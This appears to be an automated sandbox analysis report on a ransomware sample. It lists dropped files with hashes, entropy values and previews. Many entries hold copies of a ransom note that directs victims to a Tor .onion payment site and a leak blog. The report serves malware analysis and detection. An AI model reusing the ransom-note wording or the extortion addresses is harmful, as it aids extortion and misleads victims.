                        Malicious:true
                        Preview:...2.a..."./j.....CR.$..C!....<GQ..4....i1%.y.'L.vh....k,=..<.x.DD....P.`.;..m..z1..#.+.....jOi.U.....^..n.2B...l.,y..$..a5.{.....1.b....J......X+.9S.1.......GV[.P..E......j...vP.E.T...I".%...J.]..>.D.......G.....M.#.g..,..A..%.'}.JE.[.-e..w..Gl.w....(n..H..L.b-H.cJ..O.=.N.g.....A...W.@....r.=K....$..n/.Lt^..i...<.(.;6\...6...W....J....dU.......n%Y"..H.....I[L);..k.............Q......#......z...C]....k.W....^.!CO#q.q..Y.......!n...N...b.Gp.s..........Y.VR..SW.EAe=..>V..).{..\. .<IW.+....<..,.S.|5N.6od.2_....q... .....;28..4.P1.a.oN..b*.D..z..........mE5....[....x.^,...'.<..1.......U.>. xOS..Q.t..G.8.d.Wgv>.......nn'...._r..!o....W..b3.. >.n....>. ..hX......N.?...v..1...(U.|...OO... .).nde0_. .j..d. .cDz..\...bM...4.r.....e~.fl.@...f.......#d.q.(8]......=.$S.F0......4^z.\.b.....)- ....'.]_uy.'.....n$M-.....N..O06SE...!..c...%.a...7.f.....@......qs..6H-.C.}.P.T.gK\yxm..Q..$.VA.........I.....R.l....\w....vy..+.AGkku[.I..G.k.Q..B6g.=..

                        C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65644
                        Entropy (8bit):7.996955418373993
                        Encrypted:true
                        SSDEEP:1536:Lp5YIAMK5kTSQPUlBylNBxPUUpjiQvHFb2Nr/DN2umVe7c:L2eeQs/mRPjpjrJ8rLN2um+c
                        MD5:98EC6291D6D03D954FCD503981C2EF80
                        SHA1:5DC8FCC7F44A717E9AA492B6D8E122482F0383FF
                        SHA-256:13796D5EEF97E9305335F99959D445C08D4DB139FE1BCD8C0EE561646E84AFCE
                        SHA-512:80D4134F766379E73EF660EDACE8C2E8FF3DFA45385015913A446B0D5A3A38093C3FFAA09B7B170C2F8932FD7ED269AF200BDD223FCAFDD9B479CC41235488EA
                        Malicious:true
                        Preview:..2.H{b..0-....P.k.-..N.`....Bg[Y.~JSd..r4l.....,..Ma...Z...@g.........Z.=$....L.u.A.y...:.G/w@..e...HZI..UC.0s:..h...;2~...-.e....o.b......i~..t/.m...gVA....@Q.[w9.N........>i...8.yj<...<.......#...'...E=...XJjO..F.;.&.{..|/.Z.Q....Md.75F.S.^.%K##g.;>....L.S.w...O.p.]...u.=...j...5.?.!h.........Sl..3..;.5d......#z.....p....L.I.!R..._..f6....4.jz.I.z...&.$S..v72...PR.Z......n.[u:..R.v.....k..7..}d.yq.....~.]A.S.[.DJ...toa.Ct..Xm;...T.8.s.2.. ...e}...... .......J.f......W.s\t._xW.p*.j.....,XDji....h.i:.<....5;.....Y.....H}}.k].....4F..x8.#....RS .S.a....[%2....<..`a...,..4%......0..1.f...@..U;P......C...'....8./.s.......HL..F.&".O.[.y.....1..{:.)v...*a....Dq....b...qhx.|.%Z>.R%@s...SI...'43.u....Z...(... .....x.sgd..ZUh7.Qkn.6....(..b]...#..4...G....IoVvj.R..4@Gg..cP..sq.h....v....2.|.PV @.u..*..u6.xw...}.5..<"..#U..gd{.....*..n...:.v...v..4`..vs?.g....ru....j..b.t.U..J.9(...t..#.kn..D..{...u..zd...r...@..M6x$.~u...<.......8...(.o.MoXh...Y.^.I..

                        C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524396
                        Entropy (8bit):7.955172689699063
                        Encrypted:false
                        SSDEEP:12288:V++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++W:V++++++++++++++++++++++++++++++W
                        MD5:726273F26CF8A8C84DA4D1522E695498
                        SHA1:F8BC7E57F2C69C996B5B6B98168B7DBAB9DF2727
                        SHA-256:9476117FA64346CB3AB9EBB6910B5D4DE4CE051B7C1898A95E20AE7B2228C40A
                        SHA-512:BD0DA0C564A8E521C1A91F73737BA82A9718DA12DD5A4883B556B423E8CAA5C27E5CB01A1061470DE5B67C15B315E0AB86B43A7A4E4081F067005304D86FFD31
                        Malicious:false
                        Preview:..'..(.k.].l.Bz..C_..a.[N.@.V[5A..'......C..6.7.H.4L.)...C..I....q&.....K.4..`F..w..^mW..Q!G.....I`0.z..^....E.3..=T.5.l`^'r.....r.{/.`.0....:....i\...-...XZ.|....x...@l.......E.T..a.q.D.......k-...g.6.|....T.w...V7.#.S..B..x.X.P..]..D....xO....~#....C;..Bh...v...]~............'..@bh...._$@+q...QP..j.".*o....T.....{..e.I..^.{.y..,M....Z>xoU..|RH..D...x{>I?.6....Y.&...C-Q.Y..C..a.};.k;'9..2...yo.V.9.&...55.(z../h....".R..N.p.^!........0..U...jS.V.x.......x..8.......L.|.h..N..s..b.j.."+{.&......tI.U...h._...$/.m.Sh .`.pld...;..D;..Kr..D../U/.I.].r.Z..>......b.H.(CRn....r.f.;..V...6.pO6^ P...AU..%...f...r\...O'.......Mc....d...EW7.....{#...Z5?..a.*os..*..9..?....t......E5............b.Q-Qb..y_...P.B.Z......_].}..t..U.L.9..C%..2.TS(.!.7.%..g.[.e.U..T...;...X.....Hv...9M..`.-.O.).yD4$.ph...._ y.d..G.....{D5..2.'..=A.W.&.b.y.P$K......J.....x{......8w9..7.~.9.U..0.....D..U..H.N./s...{.W........L..../g...O."L.....iw.F.c...!D[.m.o`...>Q.......w.@!..

                        C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524396
                        Entropy (8bit):7.957972841097527
                        Encrypted:false
                        SSDEEP:3072:cWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWx:4
                        MD5:DC8D31F40DC7C9D436C8AE4A8ACEA33F
                        SHA1:9AB0F0A2E439CA299EA0113318BB45CD453B51AF
                        SHA-256:05AEA031E6DDC45666BE722AFDAE11C848F86824CE557CEC62A92BD08F30DD69
                        SHA-512:274383319CEDD307D9818B76A30AD0AFA4C03A86EE3F960D36A6C93CC31BC8379D5A4E825770B9C8D0BD3966A284058954970AA7A5AB2886B31111A8C8A49C99
                        Malicious:false
                        Preview:..5.7.q..).r.r..,.p.O._&..Y.':B..v.........6.c...w..k..1C=9.......m.7.K.....4/a.....w.@E....O$i..G.0z*...d.."...o..YP...@..........>.S.I_L..v|?.0..%k...1(..@.)]...Y.?.....0k.............z.-.....F..W.(,K...n.:p.^......RL.4..._.....8..9=$.........Wip..J....Re... .....TOE.7TS ..&.)......U.z.!.}.,..N8..Hh]..!.y.?.A.......3.oo..%..C.e'C....5h....9..;....c........|I....l.........m..R.9..+.a,8..f.0..:..n....$Xo...].../...~#U.vl.H.k].s...}L........J`.nPy.....$.Z.H.......$.+..p...G:a_..+...kk~..........C....}...&S....../.m<Qk....1..}...K...g.....)..vx...7....E6..!n.X).(.z.o..dC...{|.......-...r....9...:..(.\.\.u....r....).Mv.]..........c....{..*....p."B4Fr.-..6r3coPK*..sXn..x..).n...@s..&.a..j....RK..,C....a...._m[O.2L.BtQ>%..5-6Ar]B.....d....s...g...Q.sb..a...|.XG..;[H...s......9{..Q..|.v*w.4.C6........{U.p!./.B.5...\.-.....Z..;..5`>...=.<*%x.'<V..0....3Ma...XD\r.;!....7...2...G....HY.U..}x.p.i./......x...5._.>...x/ALk%t.3............(....D#....

                        C:\Users\Default\OneDrive\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\Saved Games\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Public\Desktop\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:true
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Public\Documents\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Public\Music\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:true
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Public\Pictures\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:true
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Public\Videos\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\.ms-ad\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\3D Objects\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\ARM\Acrobat_23.006.20320\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\ARM\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\ARM\S\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
